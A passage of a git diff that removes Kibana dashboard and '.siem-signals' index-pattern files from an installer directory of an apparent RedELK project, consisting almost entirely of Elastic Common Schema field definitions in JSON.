"80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", "type": "visualization"}, {"id": "0b5ffcd0-d317-11ea-9301-a30a04251ae9", "name": "d4eb5dce-3894-4599-8c17-042fc067d58c:panel_d4eb5dce-3894-4599-8c17-042fc067d58c", "type": "visualization"}, {"id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", "name": "1db7741d-210a-4331-b1cb-affc6ac1334e:panel_1db7741d-210a-4331-b1cb-affc6ac1334e", "type": "search"}, {"id": "389dddc0-d317-11ea-9301-a30a04251ae9", "name": "3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0:panel_3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0", "type": "visualization"}, {"id": "659280b0-d317-11ea-9301-a30a04251ae9", "name": "66403011-8fb6-402f-b9b6-5f503d6df704:panel_66403011-8fb6-402f-b9b6-5f503d6df704", "type": "visualization"}], "sort": [1642171876916, 97], "type": "dashboard", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_.siem-signals.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_.siem-signals.ndjson deleted file mode 100644 index 1f43fbee..00000000 --- a/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_.siem-signals.ndjson +++ /dev/null @@ -1 +0,0 @@ -{"attributes": {"fields": "[{\"count\":0,\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_score\",\"type\":\"number\",\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"agent.ephemeral_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"as.number\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"as.organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"as.organization.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"as.organization.name\"}}},{\"count\":0,\"name\":\"client.address\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.as.number\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.as.organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.as.organization.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"client.as.organization.name\"}}},{\"count\":0,\"name\":\"client.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.nat.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.nat.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.packets\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.registered_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.top_level_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.full_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.full_name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"client.user.full_name\"}}},{\"count\":0,\"name\":\"client.user.group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"client.user.name\"}}},{\"count\":0,\"name\":\"cloud.account.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"cloud.availability_zone\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"cloud.instance.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"cloud.instance.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"cloud.machine.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"cloud.provider\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"cloud.region\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"code_signature.exists\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"code_signature.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"code_signature.subject_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"code_signature.trusted\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"code_signature.valid\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"container.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"container.image.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"container.image.tag\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"container.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"container.runtime\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.address\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.as.number\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.as.organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.as.organization.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"destination.as.organization.name\"}}},{\"count\":0,\"name\":\"destination.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.nat.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.nat.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.packets\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.registered_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.top_level_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.full_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.full_name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"destination.user.full_name\"}}},{\"count\":0,\"name\":\"destination.user.group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"destination.user.name\"}}},{\"count\":0,\"name\":\"dll.code_signature.exists\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.code_signature.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.code_signature.subject_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.code_signature.trusted\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.code_signature.valid\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.hash.sha512\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.pe.company\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.pe.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.pe.file_version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.pe.original_file_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.pe.product\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.answers.class\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.answers.data\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.answers.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.answers.ttl\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.answers.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.header_flags\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.op_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.question.class\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.question.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.question.registered_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.question.subdomain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.question.top_level_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.question.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.resolved_ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.response_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"ecs.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"error.stack_trace\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"error.stack_trace.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"error.stack_trace\"}}},{\"count\":0,\"name\":\"error.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.action\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.category\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.created\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.dataset\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.duration\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.end\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.ingested\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.kind\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.module\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"event.outcome\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.provider\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true